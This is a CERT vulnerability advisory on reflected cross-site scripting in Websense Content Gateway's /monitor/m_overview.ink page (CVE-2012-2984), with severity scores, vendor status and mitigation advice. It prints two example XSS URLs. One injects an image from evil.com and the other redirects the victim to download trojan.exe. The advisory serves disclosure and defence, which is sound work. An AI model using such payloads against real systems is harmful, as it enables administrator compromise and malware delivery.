Lucene search

K
certCERTVU:318779
HistoryAug 23, 2012 - 12:00 a.m.

Websense Content Gateway XSS vulnerabilities

2012-08-2300:00:00
www.kb.cert.org
10

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

59.3%

Overview

Websense Content Gateway contains XSS vulnerabilities.

Description

Websense Content Gateway contains the following post-authentication reflective XSS vulnerabilities within the menu and item parameter values in the /monitor/m_overview.ink webpage. The reflective XSS reported allows for information disclosure and arbitrary code execution that can lead to the compromise of the Websense administrator’s account, machine, or other sensitive information.

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) CVE-2012-2984

XSS Examples:

  1. https://www.trusted.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evil.com%2fimages%2fcross_site.jpg>
  2. https://www.trusted.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>

Impact

An attacker with access to the Websense Content Gateway web interface or by tricking a logged in admin user to visit a specially crafted URL, a remote attacker can conduct a cross-site scripting attack, which could be used to result in information leakage, privilege escalation, and/or denial of service.


Solution

The vendor has reported that this vulnerability will be in addressed in version 7.7.3 which is scheduled to be released in December 2012.


Good security practices should be adopted to minimize the risk of compromise. Where possible, the administrator’s machine should be solely used for administration and segregated from Internet surfing, only whitelisted applications should be allowed to load from the administrator’s machine and the administrator should refrain from re-using the same login credentials for any other purposes.


Vendor Information

318779

Filter by status: All Affected Not Affected Unknown

Filter by content: __ Additional information available

__ Sort by: Status Alphabetical

Expand all

Javascript is disabled. Click here to view vendors.

WebSense Unknown

Notified: June 25, 2012 Updated: June 25, 2012

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

CVSS Metrics

Group Score Vector
Base 4.9 AV:N/AC:M/Au:S/C:P/I:P/A:N
Temporal 4 E:POC/RL:U/RC:UC
Environmental 1.1 CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Steven Sim Kok Leong for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2012-2984
Date Public: 2012-08-23 Date First Published:

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

59.3%

Related for VU:318779